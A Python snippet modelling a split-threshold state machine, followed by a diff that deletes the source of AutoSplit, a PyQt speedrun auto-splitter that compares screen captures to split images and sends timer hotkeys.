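def should_split(similarity: float, threshold: float, b_flag: bool, state: dict) -> bool:
    if not b_flag:
        return similarity >= threshold
    if not state.get("armed") and similarity >= threshold:
        state["armed"] = True  # above threshold: arm, but do not split yet
        return False
    if state.get("armed") and similarity < threshold:
        state["armed"] = False
        return True            # dropped back below: split now
    return False

state = {}
assert not should_split(0.95, 0.9, True, state)  # arms
assert should_split(0.50, 0.9, True, state)      # fires on the drop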
- if self.flags & 0x04 == 0x04 and self.split_below_threshold == False: - if self.waiting_for_split_delay == False and self.similarity >= self.similaritythresholdDoubleSpinBox.value(): - self.split_below_threshold = True - continue - elif self.flags & 0x04 == 0x04 and self.split_below_threshold == True: - if self.waiting_for_split_delay == False and self.similarity < self.similaritythresholdDoubleSpinBox.value(): - self.split_below_threshold = False - break - else: - if self.waiting_for_split_delay == False and self.similarity >= self.similaritythresholdDoubleSpinBox.value(): - break - - # limit the number of time the comparison runs to reduce cpu usage - fps_limit = self.fpslimitSpinBox.value() - time.sleep((1 / fps_limit) - (time.time() - start) % (1 / fps_limit)) - QtWidgets.QApplication.processEvents() - - # comes here when threshold gets met - - # We need to make sure that this isn't a dummy split before sending - # the key press. - if (self.flags & 0x01 == 0x01): - pass - else: - # If it's a delayed split, check if the delay has passed - # Otherwise calculate the split time for the key press - if self.split_delay > 0 and self.waiting_for_split_delay == False: - self.split_time = int(round(time.time() * 1000)) + self.split_delay - self.waiting_for_split_delay = True - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.currentsplitimagefileLabel.setText(' ') - self.currentSplitImage.setAlignment(QtCore.Qt.AlignCenter) - - # check for reset while delayed and display a counter of the remaining split delay time - delay_start_time = time.time() - while time.time() - delay_start_time < (self.split_delay / 1000): - self.delay_time_left = str(round((self.split_delay / 1000) - (time.time() - delay_start_time), 1)) - self.currentSplitImage.setText('Delayed Split: ' + self.delay_time_left + ' sec remaining') - # check for reset - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # calculate similarity for reset image - if self.shouldCheckResetImage() == True: - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - continue - - QtTest.QTest.qWait(1) - - self.waiting_for_split_delay = False - - # if {p} flag hit pause key, otherwise hit split hotkey - if (self.flags & 0x08 == 0x08): - keyboard.send(str(self.pausehotkeyLineEdit.text())) - else: - keyboard.send(str(self.splitLineEdit.text())) - - # increase loop number if needed, set to 1 if it was the last loop. - if self.loop_number < self.split_image_loop_amount[self.split_image_number]: - self.loop_number = self.loop_number + 1 - else: - self.loop_number = 1 - - # if loop check box is checked and its the last split, go to first split. - # else if current loop amount is back to 1, add 1 to split image number - # else pass, dont change split image number. - if self.loopCheckBox.isChecked() and self.split_image_number == self.number_of_split_images - 1 and self.loop_number == 1: - self.split_image_number = 0 - elif self.loop_number == 1: - self.split_image_number = self.split_image_number + 1 - else: - pass - - # set a "pause" split image number. 
This is done so that it can detect if user hit split/undo split while paused. - pause_split_image_number = self.split_image_number - pause_loop_number = self.loop_number - - # if its not the last split image, pause for the amount set by the user - if self.number_of_split_images != self.split_image_number: - # set current split image to none - self.currentsplitimagefileLabel.setText(' ') - self.currentSplitImage.setAlignment(QtCore.Qt.AlignCenter) - self.imageloopLabel.setText('Image Loop #: -') - - # if its the last split image and last loop number, disable the skip split button - if (self.split_image_number == self.number_of_split_images - 1 and self.loop_number == self.split_image_loop_amount[self.split_image_number]) or (self.groupDummySplitsCheckBox.isChecked() == True and self.dummy_splits_array[self.split_image_number:].count(False) <= 1): - self.skipsplitButton.setEnabled(False) - else: - self.skipsplitButton.setEnabled(True) - - # if its the first split image and first loop, disable the undo split button - if self.split_image_number == 0 and self.loop_number == 1: - self.undosplitButton.setEnabled(False) - else: - self.undosplitButton.setEnabled(True) - - QtWidgets.QApplication.processEvents() - - # I have a pause loop here so that it can check if the user presses skip split, undo split, or reset here. - # Also updates the current split image text, counting down the time until the next split image - pause_start_time = time.time() - while time.time() - pause_start_time < self.pauseDoubleSpinBox.value(): - self.pause_time_left = str(round((self.pauseDoubleSpinBox.value()) - (time.time() - pause_start_time), 1)) - self.currentSplitImage.setText('None (Paused). ' + self.pause_time_left + ' sec remaining') - - # check for reset - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # check for skip/undo split: - if self.split_image_number != pause_split_image_number or self.loop_number != pause_loop_number: - break - - # calculate similarity for reset image - if self.shouldCheckResetImage() == True: - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - continue - - QtTest.QTest.qWait(1) - - # loop breaks to here when the last image splits - self.guiChangesOnReset() - - def guiChangesOnStart(self): - self.startautosplitterButton.setText('Running..') - self.browseButton.setEnabled(False) - self.startautosplitterButton.setEnabled(False) - self.resetButton.setEnabled(True) - self.undosplitButton.setEnabled(True) - self.skipsplitButton.setEnabled(True) - self.setsplithotkeyButton.setEnabled(False) - self.setresethotkeyButton.setEnabled(False) - self.setskipsplithotkeyButton.setEnabled(False) - self.setundosplithotkeyButton.setEnabled(False) - self.setpausehotkeyButton.setEnabled(False) - self.custompausetimesCheckBox.setEnabled(False) - self.customthresholdsCheckBox.setEnabled(False) - self.groupDummySplitsCheckBox.setEnabled(False) - QtWidgets.QApplication.processEvents() - - def guiChangesOnReset(self): - self.startautosplitterButton.setText('Start Auto Splitter') - self.imageloopLabel.setText("Image Loop #:") - 
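# ---- editor's note: illustrative sketch, not part of the recorded patch ----
# findResetImage()/updateSplitImage() below build a comparison mask from the
# alpha channel: every at-least-partly-opaque BGRA pixel becomes 255 in the
# mask, then the alpha channel is stripped for the actual comparison.
import cv2
import numpy as np

bgra = np.zeros((4, 4, 4), dtype="uint8")      # stand-in for cv2.imread(path, cv2.IMREAD_UNCHANGED)
lower = np.array([0, 0, 0, 1], dtype="uint8")  # alpha >= 1
upper = np.array([255, 255, 255, 255], dtype="uint8")
mask = cv2.inRange(bgra, lower, upper)         # uint8 mask, 255 where opaque
bgr = cv2.cvtColor(bgra, cv2.COLOR_BGRA2BGR)   # comparison image, alpha removed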
self.currentSplitImage.setText(' ') - self.currentsplitimagefileLabel.setText(' ') - self.livesimilarityLabel.setText(' ') - self.highestsimilarityLabel.setText(' ') - self.browseButton.setEnabled(True) - self.startautosplitterButton.setEnabled(True) - self.resetButton.setEnabled(False) - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.setsplithotkeyButton.setEnabled(True) - self.setresethotkeyButton.setEnabled(True) - self.setskipsplithotkeyButton.setEnabled(True) - self.setundosplithotkeyButton.setEnabled(True) - self.setpausehotkeyButton.setEnabled(True) - self.custompausetimesCheckBox.setEnabled(True) - self.customthresholdsCheckBox.setEnabled(True) - self.groupDummySplitsCheckBox.setEnabled(True) - QtWidgets.QApplication.processEvents() - - def compareImage(self, image, mask, capture): - if mask is None: - if self.comparisonmethodComboBox.currentIndex() == 0: - return compare.compare_l2_norm(image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 1: - return compare.compare_histograms(image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 2: - return compare.compare_phash(image, capture) - else: - if self.comparisonmethodComboBox.currentIndex() == 0: - return compare.compare_l2_norm_masked(image, capture, mask) - elif self.comparisonmethodComboBox.currentIndex() == 1: - return compare.compare_histograms_masked(image, capture, mask) - elif self.comparisonmethodComboBox.currentIndex() == 2: - return compare.compare_phash_masked(image, capture, mask) - - def getCaptureForComparison(self, masked): - # grab screenshot of capture region - capture = capture_windows.capture_region(self.hwnd, self.rect) - - # if flagged as a mask, capture with nearest neighbor interpolation. else don't so that - # threshold settings on versions below 1.2.0 aren't messed up - if (masked): - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), interpolation=cv2.INTER_NEAREST) - else: - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - # convert to BGR - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR) - - return capture - - def shouldCheckResetImage(self): - if self.reset_image is not None and time.time() - self.run_start_time > self.reset_image_pause_time: - return True - - return False - - def findResetImage(self): - self.reset_image = None - self.reset_mask = None - self.reset_image_threshold = None - - reset_image_file = None - for i, image in enumerate(self.split_image_filenames): - if split_parser.is_reset_image(image): - reset_image_file = image - break - - if reset_image_file is None: - return - - self.split_image_filenames.remove(reset_image_file) - - # create reset image and keep in memory - path = self.split_image_directory + reset_image_file - flags = split_parser.flags_from_filename(reset_image_file) - - self.reset_image_threshold = split_parser.threshold_from_filename(reset_image_file) - - self.reset_image_pause_time = split_parser.pause_from_filename(reset_image_file) - if self.reset_image_pause_time is None: - self.reset_image_pause_time = 0 - - # if theres a mask flag, create a mask - if (flags & 0x02 == 0x02): - # create mask based on resized, nearest neighbor interpolated split image - self.reset_image = cv2.imread(path, cv2.IMREAD_UNCHANGED) - self.reset_image = cv2.resize(self.reset_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), - interpolation=cv2.INTER_NEAREST) - lower = np.array([0, 0, 0, 1], dtype="uint8") - upper = np.array([255, 255, 255, 255], dtype="uint8") - 
self.reset_mask = cv2.inRange(self.reset_image, lower, upper) - - # set split image as BGR - self.reset_image = cv2.cvtColor(self.reset_image, cv2.COLOR_BGRA2BGR) - - # else if there is no mask flag, open image normally. don't interpolate nearest neighbor here so setups before 1.2.0 still work. - else: - self.reset_image = cv2.imread(path, cv2.IMREAD_COLOR) - self.reset_image = cv2.resize(self.reset_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - def updateSplitImage(self): - - # get split image path - split_image_file = self.split_image_filenames[0 + self.split_image_number] - self.split_image_path = self.split_image_directory + split_image_file - - # get flags - self.flags = split_parser.flags_from_filename(split_image_file) - - # set current split image in UI - # if flagged as mask, transform transparency into UI's gray BG color - if (self.flags & 0x02 == 0x02): - self.split_image_display = cv2.imread(self.split_image_path, cv2.IMREAD_UNCHANGED) - transparent_mask = self.split_image_display[:, :, 3] == 0 - self.split_image_display[transparent_mask] = [240, 240, 240, 255] - self.split_image_display = cv2.cvtColor(self.split_image_display, cv2.COLOR_BGRA2RGB) - self.split_image_display = cv2.resize(self.split_image_display, (240, 180)) - # if not flagged as mask, open normally - else: - self.split_image_display = cv2.imread(self.split_image_path, cv2.IMREAD_COLOR) - self.split_image_display = cv2.cvtColor(self.split_image_display, cv2.COLOR_BGR2RGB) - self.split_image_display = cv2.resize(self.split_image_display, (240, 180)) - - qImg = QtGui.QImage(self.split_image_display, self.split_image_display.shape[1], - self.split_image_display.shape[0], self.split_image_display.shape[1] * 3, - QtGui.QImage.Format_RGB888) - self.updateCurrentSplitImage.emit(qImg) - self.currentsplitimagefileLabel.setText(split_image_file) - - # if theres a mask flag, create a mask - if (self.flags & 0x02 == 0x02): - - # create mask based on resized, nearest neighbor interpolated split image - self.split_image = cv2.imread(self.split_image_path, cv2.IMREAD_UNCHANGED) - self.split_image = cv2.resize(self.split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), - interpolation=cv2.INTER_NEAREST) - lower = np.array([0, 0, 0, 1], dtype="uint8") - upper = np.array([255, 255, 255, 255], dtype="uint8") - self.mask = cv2.inRange(self.split_image, lower, upper) - - # set split image as BGR - self.split_image = cv2.cvtColor(self.split_image, cv2.COLOR_BGRA2BGR) - - # else if there is no mask flag, open image normally. don't interpolate nearest neighbor here so setups before 1.2.0 still work. - else: - split_image = cv2.imread(self.split_image_path, cv2.IMREAD_COLOR) - self.split_image = cv2.resize(split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - self.mask = None - - # If the unique parameters are selected, go ahead and set the spinboxes to those values - if self.custompausetimesCheckBox.isChecked(): - self.pauseDoubleSpinBox.setValue(split_parser.pause_from_filename(split_image_file)) - - if self.customthresholdsCheckBox.isChecked(): - self.similaritythresholdDoubleSpinBox.setValue(split_parser.threshold_from_filename(split_image_file)) - - # Get delay for split, if any - self.split_delay = split_parser.delay_from_filename(split_image_file) - - # Set Image Loop # - self.imageloopLabel.setText("Image Loop #: " + str(self.loop_number)) - - # need to set split below threshold to false each time an image updates. 
- self.split_below_threshold = False - - self.similarity = 0 - self.highest_similarity = 0.001 - - # exit safely when closing the window - def closeEvent(self, event): - if self.haveSettingsChanged(): - #give a different warning if there was never a settings file that was loaded successfully, and save as instead of save. - if self.last_successfully_loaded_settings_file_path == None: - msgBox = QtWidgets.QMessageBox - warning = msgBox.warning(self, "AutoSplit","Do you want to save changes made to settings file Untitled?", msgBox.Yes | msgBox.No | msgBox.Cancel) - if warning == msgBox.Yes: - self.saveSettingsAs() - sys.exit() - event.accept() - if warning == msgBox.No: - event.accept() - sys.exit() - pass - if warning == msgBox.Cancel: - event.ignore() - return - else: - msgBox = QtWidgets.QMessageBox - warning = msgBox.warning(self, "AutoSplit", "Do you want to save the changes made to the settings file " + os.path.basename(self.last_successfully_loaded_settings_file_path) + " ?", msgBox.Yes | msgBox.No | msgBox.Cancel) - if warning == msgBox.Yes: - self.saveSettings() - sys.exit() - event.accept() - if warning == msgBox.No: - event.accept() - sys.exit() - pass - if warning == msgBox.Cancel: - event.ignore() - return - else: - event.accept() - sys.exit() - - - -def main(): - app = QtWidgets.QApplication(sys.argv) - app.setWindowIcon(QtGui.QIcon('icon.ico')) - w = AutoSplit() - w.setWindowIcon(QtGui.QIcon('icon.ico')) - w.show() - sys.exit(app.exec_()) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.target.py deleted file mode 100644 index 6101253..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.target.py +++ /dev/null @@ -1,965 +0,0 @@ -#!/usr/bin/python3.9 -# -*- coding: utf-8 -*- - -from PyQt6 import QtCore, QtGui, QtTest, QtWidgets -from win32 import win32gui -import sys -import os -import cv2 -import time -import ctypes.wintypes -import ctypes -import keyboard -import numpy as np - -import design -import compare -import capture_windows -import split_parser - - -class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - from hotkeys import ( - beforeSettingHotkey, afterSettingHotkey, setSplitHotkey, setResetHotkey, setSkipSplitHotkey, setUndoSplitHotkey, - setPauseHotkey) - from error_messages import ( - splitImageDirectoryError, splitImageDirectoryNotFoundError, imageTypeError, regionError, regionSizeError, - splitHotkeyError, customThresholdError, customPauseError, alphaChannelError, alignRegionImageTypeError, - oldVersionSettingsFileError, noSettingsFileOnOpenError, tooManySettingsFilesOnOpenError, invalidSettingsError) - from settings_file import saveSettings, saveSettingsAs, loadSettings, haveSettingsChanged, getSaveSettingsValues - from screen_region import selectRegion, selectWindow, alignRegion - from menu_bar import about, viewHelp - - myappid = u'mycompany.myproduct.subproduct.version' - ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid) - - # signals - updateCurrentSplitImage = QtCore.pyqtSignal(QtGui.QImage) - startAutoSplitterSignal = QtCore.pyqtSignal() - resetSignal = QtCore.pyqtSignal() - skipSplitSignal = QtCore.pyqtSignal() - undoSplitSignal = QtCore.pyqtSignal() - pauseSignal = QtCore.pyqtSignal() - afterSettingHotkeySignal = QtCore.pyqtSignal() - - def __init__(self, parent=None): - super(AutoSplit, self).__init__(parent) - self.setupUi(self) - - # close all processes when 
closing window - self.actionView_Help.triggered.connect(self.viewHelp) - self.actionAbout.triggered.connect(self.about) - self.actionSave_Settings.triggered.connect(self.saveSettings) - self.actionSave_Settings_As.triggered.connect(self.saveSettingsAs) - self.actionLoad_Settings.triggered.connect(self.loadSettings) - - # disable buttons upon open - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.resetButton.setEnabled(False) - - # resize to these width and height so that FPS performance increases - self.RESIZE_WIDTH = 320 - self.RESIZE_HEIGHT = 240 - - # split image folder line edit text - self.splitimagefolderLineEdit.setText('No Folder Selected') - - # Connecting button clicks to functions - self.browseButton.clicked.connect(self.browse) - self.selectregionButton.clicked.connect(self.selectRegion) - self.takescreenshotButton.clicked.connect(self.takeScreenshot) - self.startautosplitterButton.clicked.connect(self.autoSplitter) - self.checkfpsButton.clicked.connect(self.checkFPS) - self.resetButton.clicked.connect(self.reset) - self.skipsplitButton.clicked.connect(self.skipSplit) - self.undosplitButton.clicked.connect(self.undoSplit) - self.setsplithotkeyButton.clicked.connect(self.setSplitHotkey) - self.setresethotkeyButton.clicked.connect(self.setResetHotkey) - self.setskipsplithotkeyButton.clicked.connect(self.setSkipSplitHotkey) - self.setundosplithotkeyButton.clicked.connect(self.setUndoSplitHotkey) - self.setpausehotkeyButton.clicked.connect(self.setPauseHotkey) - self.alignregionButton.clicked.connect(self.alignRegion) - self.selectwindowButton.clicked.connect(self.selectWindow) - - # update x, y, width, and height when changing the value of these spinbox's are changed - self.xSpinBox.valueChanged.connect(self.updateX) - self.ySpinBox.valueChanged.connect(self.updateY) - self.widthSpinBox.valueChanged.connect(self.updateWidth) - self.heightSpinBox.valueChanged.connect(self.updateHeight) - - # connect signals to functions - self.updateCurrentSplitImage.connect(self.updateSplitImageGUI) - self.afterSettingHotkeySignal.connect(self.afterSettingHotkey) - self.startAutoSplitterSignal.connect(self.autoSplitter) - self.resetSignal.connect(self.reset) - self.skipSplitSignal.connect(self.skipSplit) - self.undoSplitSignal.connect(self.undoSplit) - #self.pauseSignal.connect(self.pause) - - # live image checkbox - self.liveimageCheckBox.clicked.connect(self.checkLiveImage) - self.timerLiveImage = QtCore.QTimer() - self.timerLiveImage.timeout.connect(self.liveImageFunction) - - # Default Settings for the region capture - self.hwnd = 0 - self.hwnd_title = '' - self.rect = ctypes.wintypes.RECT() - - #last loaded settings and last successful loaded settings file path to None until we try to load them - self.last_loaded_settings = None - self.last_successfully_loaded_settings_file_path = None - - # find all .pkls in AutoSplit folder, error if there is none or more than 1 - self.load_settings_on_open = True - self.loadSettings() - self.load_settings_on_open = False - - # initialize a few settings options - self.last_saved_settings = None - - self.live_image_function_on_open = True - - # FUNCTIONS - #TODO add checkbox for going back to image 1 when resetting. - def browse(self): - # User selects the file with the split images in it. - self.split_image_directory = str( - QtWidgets.QFileDialog.getExistingDirectory(self, "Select Split Image Directory")) + '\\' - - # If the user doesn't select a folder, it defaults to \. 
Set it back to whats in the LineEdit, and return - if self.split_image_directory == '\\': - self.split_image_directory = self.splitimagefolderLineEdit.text() - return - - # set the split image folder line to the directory text - self.splitimagefolderLineEdit.setText(self.split_image_directory) - - def checkLiveImage(self): - if self.liveimageCheckBox.isChecked(): - self.timerLiveImage.start(int(1000 / 60)) - else: - self.timerLiveImage.stop() - self.liveImageFunction() - - def liveImageFunction(self): - try: - if win32gui.GetWindowText(self.hwnd) == '' and self.live_image_function_on_open == True: - self.timerLiveImage.stop() - self.live_image_function_on_open = False - return - - elif win32gui.GetWindowText(self.hwnd) == '' and self.live_image_function_on_open == False: - self.regionError() - self.timerLiveImage.stop() - return - - ctypes.windll.user32.SetProcessDPIAware() - - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.resize(capture, (240, 180)) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2RGB) - - # Convert to set it on the label - qImg = QtGui.QImage(capture, capture.shape[1], capture.shape[0], capture.shape[1] * 3, - QtGui.QImage.Format.Format_RGB888) - pix = QtGui.QPixmap(qImg) - self.liveImage.setPixmap(pix) - - except AttributeError: - pass - - # update x, y, width, height when spinbox values are changed - def updateX(self): - try: - self.rect.left = self.xSpinBox.value() - self.rect.right = self.rect.left + self.widthSpinBox.value() - self.checkLiveImage() - except AttributeError: - pass - - def updateY(self): - try: - self.rect.top = self.ySpinBox.value() - self.rect.bottom = self.rect.top + self.heightSpinBox.value() - self.checkLiveImage() - except AttributeError: - pass - - def updateWidth(self): - self.rect.right = self.rect.left + self.widthSpinBox.value() - self.checkLiveImage() - - def updateHeight(self): - self.rect.bottom = self.rect.top + self.heightSpinBox.value() - self.checkLiveImage() - - # update current split image. needed this to avoid updating it through the hotkey thread. - def updateSplitImageGUI(self, qImg): - pix = QtGui.QPixmap(qImg) - self.currentSplitImage.setPixmap(pix) - - def takeScreenshot(self): - # error checks - if self.splitimagefolderLineEdit.text() == 'No Folder Selected': - self.splitImageDirectoryError() - return - if os.path.exists(self.splitimagefolderLineEdit.text()) == False: - self.splitImageDirectoryNotFoundError() - return - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.regionError() - return - take_screenshot_filename = '001_SplitImage' - - # check if file exists and rename it if it does - # Below starts the FileNameNumber at #001 up to #999. After that it will go to 1000, - # which is a problem, but I doubt anyone will get to 1000 split images... - i = 1 - while os.path.exists(self.split_image_directory + take_screenshot_filename + '.png') == True: - FileNameNumber = (f"{i:03}") - take_screenshot_filename = FileNameNumber + '_SplitImage' - i = i + 1 - - # grab screenshot of capture region - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR) - - # save and open image - cv2.imwrite(self.split_image_directory + take_screenshot_filename + '.png', capture) - os.startfile(self.split_image_directory + take_screenshot_filename + '.png') - - # check max FPS button connects here. 
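# liveImageFunction above converts an OpenCV BGRA capture into a QImage with
# an explicit stride. A minimal sketch of that conversion (the helper name is
# illustrative); passing bytes-per-line = width * 3 for packed RGB888 avoids
# skewed rows when the width is not a multiple of 4.
import cv2
import numpy as np
from PyQt6 import QtGui

def frame_to_qimage(frame_bgra: np.ndarray) -> QtGui.QImage:
    rgb = cv2.cvtColor(frame_bgra, cv2.COLOR_BGRA2RGB)
    height, width, _ = rgb.shape
    return QtGui.QImage(rgb.data, width, height, width * 3,
                        QtGui.QImage.Format.Format_RGB888)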
- def checkFPS(self): - # error checking - split_image_directory = self.splitimagefolderLineEdit.text() - if split_image_directory == 'No Folder Selected' or split_image_directory is None: - self.splitImageDirectoryError() - return - - split_image_filenames = os.listdir(split_image_directory) - for image in split_image_filenames: - if cv2.imread(self.split_image_directory + image, cv2.IMREAD_COLOR) is None: - self.imageTypeError(image) - return - else: - pass - - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.regionError() - return - - if self.width == 0 or self.height == 0: - self.regionSizeError() - return - - # grab first image in the split image folder - split_image_file = split_image_filenames[0] - split_image_path = split_image_directory + split_image_file - split_image = cv2.imread(split_image_path, cv2.IMREAD_COLOR) - split_image = cv2.cvtColor(split_image, cv2.COLOR_BGR2RGB) - split_image = cv2.resize(split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - # run 10 iterations of screenshotting capture region + comparison. - count = 0 - t0 = time.time() - while count < 10: - - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2RGB) - - if self.comparisonmethodComboBox.currentIndex() == 0: - similarity = compare.compare_l2_norm(split_image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 1: - similarity = compare.compare_histograms(split_image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 2: - similarity = compare.compare_phash(split_image, capture) - - count = count + 1 - - # calculate FPS - t1 = time.time() - FPS = int(10 / (t1 - t0)) - FPS = str(FPS) - self.fpsvalueLabel.setText(FPS) - - # undo split button and hotkey connect to here - def undoSplit(self): - if self.undosplitButton.isEnabled() == False: - return - - if self.loop_number != 1 and self.groupDummySplitsCheckBox.isChecked() == False: - self.loop_number = self.loop_number - 1 - - elif self.groupDummySplitsCheckBox.isChecked() == True: - for i, group in enumerate(self.split_groups): - if i > 0 and self.split_image_number in group: - self.split_image_number = self.split_groups[i - 1][0] - break - - else: - self.split_image_number = self.split_image_number - 1 - self.loop_number = self.split_image_loop_amount[self.split_image_number] - - self.updateSplitImage() - - return - - # skip split button and hotkey connect to here - def skipSplit(self): - - if self.skipsplitButton.isEnabled() == False: - return - - if self.loop_number < self.split_image_loop_amount[self.split_image_number] and self.groupDummySplitsCheckBox.isChecked() == False: - self.loop_number = self.loop_number + 1 - elif self.groupDummySplitsCheckBox.isChecked() == True: - for group in self.split_groups: - if self.split_image_number in group: - self.split_image_number = group[-1] + 1 - break - else: - self.split_image_number = self.split_image_number + 1 - self.loop_number = 1 - - self.updateSplitImage() - - return - - #def pause(self): - #TODO add what to do when you hit pause hotkey, if this even needs to be done - - def reset(self): - # when the reset button or hotkey is pressed, it will change this text, which will trigger in the autoSplitter function, if running, to abort and change GUI. 
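# checkFPS above times ten capture-plus-compare iterations and reports
# iterations / elapsed seconds. The same measurement as a standalone helper;
# capture_and_compare is a stand-in for one screenshot-and-comparison pass.
import time

def measure_fps(capture_and_compare, iterations: int = 10) -> int:
    t0 = time.time()
    for _ in range(iterations):
        capture_and_compare()
    return int(iterations / (time.time() - t0))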
- self.startautosplitterButton.setText('Start Auto Splitter') - return - - # functions for the hotkeys to return to the main thread from signals and start their corresponding functions - def startAutoSplitter(self): - # if the auto splitter is already running or the button is disabled, don't emit the signal to start it. - if self.startautosplitterButton.text() == 'Running..' or self.startautosplitterButton.isEnabled() == False: - return - else: - self.startAutoSplitterSignal.emit() - - def startReset(self): - self.resetSignal.emit() - - def startSkipSplit(self): - self.skipSplitSignal.emit() - - def startUndoSplit(self): - self.undoSplitSignal.emit() - - def startPause(self): - self.pauseSignal.emit() - - def autoSplitter(self): - # error checking: - if str(self.splitimagefolderLineEdit.text()) == 'No Folder Selected': - self.guiChangesOnReset() - self.splitImageDirectoryError() - return - if os.path.exists(self.splitimagefolderLineEdit.text()) == False: - self.guiChangesOnReset() - self.splitImageDirectoryNotFoundError() - return - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.guiChangesOnReset() - self.regionError() - return - - # get split image filenames - self.split_image_filenames = os.listdir(self.split_image_directory) - - # Make sure that each of the images follows the guidelines for correct format - # according to all of the settings selected by the user. - for image in self.split_image_filenames: - - # Check to make sure the file is actually an image format that can be opened - # according to the mask flag - if split_parser.flags_from_filename(image) & 0x02 == 0x02: - source = cv2.imread(self.split_image_directory + image, cv2.IMREAD_UNCHANGED) - - if source is None: - # Opencv couldn't open this file as an image, this isn't a correct - # file format that is supported - self.guiChangesOnReset() - self.imageTypeError(image) - return - - if source.shape[2] != 4: - # Error, this file doesn't have an alpha channel even - # though the flag for masking was added - self.guiChangesOnReset() - self.alphaChannelError(image) - return - - else: - if cv2.imread(self.split_image_directory + image, cv2.IMREAD_COLOR) is None: - # Opencv couldn't open this file as an image, this isn't a correct - # file format that is supported - self.guiChangesOnReset() - self.imageTypeError(image) - return - - #error out if there is a {p} flag but no pause hotkey set. 
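# A sketch of the mask-flag validation performed above: an image used as a
# mask must load with an alpha channel, i.e. four channels under
# IMREAD_UNCHANGED. The helper name is illustrative.
import cv2

def has_alpha_channel(path: str) -> bool:
    img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
    return img is not None and img.ndim == 3 and img.shape[2] == 4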
- if self.pausehotkeyLineEdit.text() == '' and split_parser.flags_from_filename(image) & 0x08 == 0x08: - self.guiChangesOnReset() - self.pauseHotkeyError() - return - - if self.custompausetimesCheckBox.isChecked() and split_parser.pause_from_filename(image) is None: - # Error, this file doesn't have a pause, but the checkbox was - # selected for unique pause times - self.guiChangesOnReset() - self.customPauseError(image) - return - - if self.customthresholdsCheckBox.isChecked() and split_parser.threshold_from_filename(image) is None: - # Error, this file doesn't have a threshold, but the checkbox - # was selected for unique thresholds - self.guiChangesOnReset() - self.customThresholdError(image) - return - - if self.splitLineEdit.text() == '': - self.guiChangesOnReset() - self.splitHotkeyError() - return - - # find reset image then remove it from the list - self.findResetImage() - - # Check that there's only one reset image - for image in self.split_image_filenames: - - if split_parser.is_reset_image(image): - self.guiChangesOnReset() - self.multipleResetImagesError() - return - - # if there is no custom threshold for the reset image, throw an error. - if self.reset_image is not None and self.reset_image_threshold is None: - self.guiChangesOnReset() - self.noResetImageThresholdError() - return - - # If there is no reset hotkey set but a reset image is present, throw an error. - if self.resetLineEdit.text() == '' and self.reset_image is not None: - self.guiChangesOnReset() - self.resetHotkeyError() - return - - # construct groups of splits if needed - self.split_groups = [] - if self.groupDummySplitsCheckBox.isChecked(): - current_group = [] - self.split_groups.append(current_group) - - for i, image in enumerate(self.split_image_filenames): - current_group.append(i) - - flags = split_parser.flags_from_filename(image) - if flags & 0x01 != 0x01 and i < len(self.split_image_filenames) - 1: - current_group = [] - self.split_groups.append(current_group) - - # construct dummy splits array - self.dummy_splits_array = [] - for i, image in enumerate(self.split_image_filenames): - if split_parser.flags_from_filename(image) & 0x01 == 0x01: - self.dummy_splits_array.append(True) - else: - self.dummy_splits_array.append(False) - - # construct loop amounts for each split image - self.split_image_loop_amount = [] - for i, image in enumerate(self.split_image_filenames): - self.split_image_loop_amount.append(split_parser.loop_from_filename(image)) - - if any(x > 1 for x in self.split_image_loop_amount) and self.groupDummySplitsCheckBox.isChecked() == True: - self.dummySplitsError() - return - - self.guiChangesOnStart() - - # initialize some settings - self.split_image_number = 0 - self.loop_number = 1 - self.number_of_split_images = len(self.split_image_filenames) - self.waiting_for_split_delay = False - self.split_below_threshold = False - - 